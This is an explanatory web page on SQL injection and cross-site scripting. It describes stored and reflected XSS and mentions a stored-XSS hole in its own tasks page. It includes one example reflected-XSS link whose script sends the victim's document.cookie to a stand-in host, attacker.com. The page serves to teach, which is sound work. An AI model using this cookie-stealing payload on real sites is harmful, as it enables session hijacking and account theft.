We're live-coding on Twitch! Join us!
SQL Injection and XSS Security Threats

SQL Injection and XSS Security Threats

SQL injection

A SQL injection attack happens when structured query language (SQL) code is injected into forms, cookies, or http headers that do not use data sanitizing or validation methods to verify the request. This flaw allows data extraction, changes, or deletion from databases that are connected to websites. XSS

Cross-Site Scripting (XSS)

An XSS attack uses malicious code to redirect users to malicious websites, steal cookies or credentials, or deface websites. This is usually accomplished using malicious scripts that are executed in client browsers as a result of user input, functional statements, client requests, or other expressions.

There are major 2 types of cross site scripting, stored XSS and Reflected XSS

Stored XSS Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application without that data being made safe to render in the browser. In our application, this is happening in the tasks page, a script can be added in the description, which later gets automatically executed when a person visits the tasks page

Reflected XSS Reflected XSS occurs when user input is immediately returned by a web application in an error message, search result, or any other response Considering this through an example-

  1. Suppose there is a search functionality in your application and let the search url be some like this https://example.com/news?q=data+breach In the search results the website reflects the content of the query that the user searched for, such as: You searched for "data breach"

  2. If the Search functionality is vulnerable to a reflected cross-site scripting vulnerability, the attacker can send the victim a link such as the below

    https://example.com/news?q=<script>document.location='https://attacker.com/log.php?c=' + encodeURIComponent(document.cookie)</script>

    Once the victim clicks on the link, the website will display the following

    You searched for "<script>document.location='https://attacker.com/log.php?c=' + document.cookie</script>"

The HTML source code, which is reflecting the attacker's malicious code redirects the victim to a website that is controlled by the attacker, which can then record the user's current cookie for example.com as GET parameter.

To sum it up, the main difference between a SQL and XSS injection attack is that SQL injection attacks are used to steal information from databases whereas XSS attacks are mainly used to redirect users to websites where attackers can steal data from them.